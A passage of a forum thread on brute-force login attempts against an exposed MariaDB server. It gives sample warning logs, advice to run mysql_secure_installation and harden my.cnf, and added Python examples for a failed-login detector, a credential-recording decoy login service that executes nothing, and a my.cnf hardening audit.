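    "2020-12-15 11:38:42 2074 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)",
    "2020-12-15 11:38:42 2075 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)",
    "2020-12-15 11:38:43 2076 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)",
    "2020-12-15 11:38:43 2077 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)",
    "2020-12-15 11:38:44 2078 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)",
    "2020-12-15 11:38:44 2079 [Warning] Access denied for user 'mcUser'@'66.128.254.69' (using password: YES)",
    "2020-12-15 11:38:48 2088 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)",
    "2020-12-15 11:38:49 2091 [Warning] Access denied for user 'mcUser'@'66.128.254.69' (using password: YES)",
    "2020-12-15 12:42:01 2297 [Warning] Hostname 'zg-0915b-171.stretchoid.com' does not resolve to '192.241.238.9'.",
    "2020-12-15 14:12:35 2444 [Warning] IP address '42.192.225.22' could not be resolved: Name or service not known",
    "2020-12-15 15:01:02 2600 [Warning] Access denied for user 'root'@'198.51.100.7' (using password: YES)",
]

if __name__ == '__main__':
    for host, r in detect(SAMPLE_LINES).items():
        print(host, r['total'], sorted(r['users']), r['first_alert'])
    print('reverse-DNS warnings:', count_dns_noise(SAMPLE_LINES))
```

The window logic is the same one fail2ban applies with `maxretry` and `findtime`; keeping the distinct-user set is the extra that tells you whether the attacker has a target account or is just spraying root/admin/mysql/test across the internet.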

#!drvy

Quote: For a few hours I forgot to add skip-networking to MariaDB's (MySQL) my.cnf

Always recommended after installing mysql-server: run

Code (bash):
mysql_secure_installation

Regards

Daniel

Hi, regarding the login attempts it's like drvy says! You assign a public IP and bring up a server and the login attempts appear right away, but for these you could set a rather interesting and ingenious trap, something that works perfectly for login attempts or brute force.

What is the goal of brute-forcing a system? Or what do they want to do when they try to log in with some username on the server? It is precisely to obtain the correct credentials to get in, but, after getting in, what happens to those attempts? They simply stop, they stop insisting because obviously they already got access.

What could be done is to say OK to everything: when a system detects those attempts, it accepts the logins as if they were correct, it tricks them, and when the attacker thinks he already has access, it's simply false, he doesn't have it, but his automated system (the attacker's) is useless, because everything he tries is correct even though obviously they are fake logins and it won't give him access to anything. This way the attacker is left confused and will notice that security measure, and what will he end up doing? Abandoning the site... the same if it's something automated: by accepting any login that bot/script will stop, and so will the attempts.

It is possibly a safer method than other systems that reject those thousands of logins all the time; this way it accepts them and makes them believe they have access when in reality they don't, and so they can't tell which login is the correct one. It's like port scanners that can be made to believe (by making them appear open) that certain ports are open to attackers or automated systems when they are really closed.


Regards
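The "accept every login" decoy described in the post above, as an added example that is not the poster's code. It only makes sense as a decoy on a port that serves nothing real: a production daemon cannot be told to accept everything, and whether a bot actually stops depends on how it verifies success; what the decoy reliably yields is the list of credentials and commands tried. The protocol here is a minimal line-based telnet-style login invented for the example, as are the banner, the fake prompt and the canned command output.

```python
"""Decoy login service that accepts any credentials, records them, and
answers commands from a canned table without executing anything.  Added
example, not code from the original post; protocol, banner, prompts and
canned output are this example's own inventions."""
import datetime
import socketserver


class FakeLoginSession:
    """Line-oriented protocol: username, password, then commands.
    Every credential pair is 'accepted'; every command gets a canned
    reply; nothing is ever executed.  Captured attempts are appended to
    the shared `log` list as dicts."""

    BANNER = 'login: '
    # What the decoy answers for the commands bots usually fire first.
    CANNED = {
        'id': 'uid=0(root) gid=0(root) groups=0(root)',
        'uname -a': 'Linux srv 4.19.0 #1 SMP x86_64 GNU/Linux',
    }

    def __init__(self, peer: str, log: list):
        self.peer = peer
        self.log = log
        self.state = 'user'
        self.user = None
        self.commands = []          # shared with the log entry below

    def feed(self, line: str) -> str:
        """Consume one client line and return the bytes-as-str to send."""
        line = line.rstrip('\r\n')
        if self.state == 'user':
            self.user = line
            self.state = 'password'
            return 'Password: '
        if self.state == 'password':
            # The credential pair is the intelligence a decoy produces.
            self.log.append({
                'ts': datetime.datetime.now(datetime.timezone.utc).isoformat(),
                'peer': self.peer, 'user': self.user, 'password': line,
                'commands': self.commands,
            })
            self.state = 'shell'
            return 'Last login: Mon Dec 14 12:58:24 2020 from 10.0.0.5\n# '
        # 'shell': never execute; answer from the table or pretend success
        # silently, exactly like a real shell does for a quiet command.
        self.commands.append(line)
        return self.CANNED.get(line, '') + '\n# '


ATTEMPTS = []   # one dict per captured credential pair


class Handler(socketserver.StreamRequestHandler):
    """Drive one FakeLoginSession per TCP connection."""

    def handle(self):
        session = FakeLoginSession(self.client_address[0], ATTEMPTS)
        self.wfile.write(session.BANNER.encode())
        for raw in self.rfile:
            reply = session.feed(raw.decode('utf-8', 'replace'))
            self.wfile.write(reply.encode())
            if session.commands and session.commands[-1] == 'exit':
                break


if __name__ == '__main__':
    # Loopback for the demo; a real decoy binds the exposed port and
    # ships ATTEMPTS to a log collector instead of keeping them in memory.
    with socketserver.ThreadingTCPServer(('127.0.0.1', 2222), Handler) as srv:
        srv.serve_forever()
```

Point `nc 127.0.0.1 2222` at it and type any user and password: you get a prompt, `id` returns the canned root line, and every command lands in `ATTEMPTS` with the credentials that preceded it. Real sshd or MariaDB stay on their own ports with real authentication; the decoy only harvests what the scanners bring.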

el-brujo

You're right #!drvy, I forgot to run the "secure installation" because I copied part of the config over from the migrated server.

https://mariadb.com/kb/en/mysql_secure_installation/

I don't have the test database or the anonymous user.

I added some other basic security options in the my.cnf file


Code (my.cnf):
[mysqld]
# security
# disable LOAD DATA LOCAL INFILE
local-infile=0
# comment out to allow remote mysql
skip-networking
# no dns lookups
skip-name-resolve


Quote: What is the goal of brute-forcing a system? Or what do they want to do when they try to log in with some username on the server?

They're automated, scripted attacks for sure. If you use weak or default credentials, well, there you go, you end up part of a botnet or something worse.
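A check for the three my.cnf options from the post above, as an added example that is not code from the post: it parses an option file and reports whether the [mysqld] section disables the TCP listener (skip-networking, or failing that a loopback bind-address), turns off local-infile and sets skip-name-resolve. The policy is this example's own reading of those settings; the weak and hardened sample files are constructed, the hardened one reproducing the post's fragment.

```python
"""Audit a MariaDB/MySQL option file for the hardening settings named in
the post above.  Added example, not code from the post; the policy is
this example's own and the two sample files are constructed."""
import configparser


def load_mysqld(text: str) -> dict:
    """Return the [mysqld] options as {name: value}, names lower-cased
    with '_' normalised to '-' (the server accepts both spellings).
    Bare options such as skip-networking come back with value None."""
    cp = configparser.ConfigParser(allow_no_value=True, strict=False,
                                   interpolation=None, delimiters=('=',))
    cp.read_string(text)
    if not cp.has_section('mysqld'):
        return {}
    return {k.lower().replace('_', '-'): (v.strip() if v is not None else None)
            for k, v in cp.items('mysqld')}


def audit(options: dict) -> list:
    """Return a list of findings; an empty list means the file passes."""
    findings = []
    # Remote TCP access: skip-networking removes the listener outright;
    # otherwise it must at least be bound to loopback.
    if 'skip-networking' not in options:
        if options.get('bind-address') not in ('127.0.0.1', '::1', 'localhost'):
            findings.append('TCP listener reachable from outside: set '
                            'skip-networking or bind-address=127.0.0.1')
    # LOAD DATA LOCAL INFILE reads files from the client side; with a web
    # app on the same box an SQL injection can use it to read that host's
    # files, which is the usual reason it is turned off on a web server.
    local_infile = str(options.get('local-infile', '1')).lower()
    if local_infile not in ('0', 'off', 'false'):
        findings.append('local-infile not disabled: set local-infile=0')
    # One reverse lookup per connection: slow under a brute-force flood
    # and a DNS-spoofing surface for host-name based grants.
    if 'skip-name-resolve' not in options:
        findings.append('skip-name-resolve missing: reverse DNS on every connect')
    return findings


# Constructed: a server left listening on every interface.
WEAK = """
[mysqld]
bind-address = 0.0.0.0
local-infile = 1
"""

# Constructed from the fragment in the post above.
HARDENED = """
[mysqld]
#security
local-infile=0
# comment out to allow remote mysql
skip-networking
#no dns lookups
skip-name-resolve
"""

if __name__ == '__main__':
    for name, text in (('weak', WEAK), ('hardened', HARDENED)):
        print(name, audit(load_mysqld(text)) or ['ok'])
```

To audit a live server, pass `open('/etc/mysql/my.cnf').read()` (or the `!includedir` fragments your distribution splits it into) to `load_mysqld`; the parser accepts either the `skip-networking` or `skip_networking` spelling, so a file that used underscores still passes.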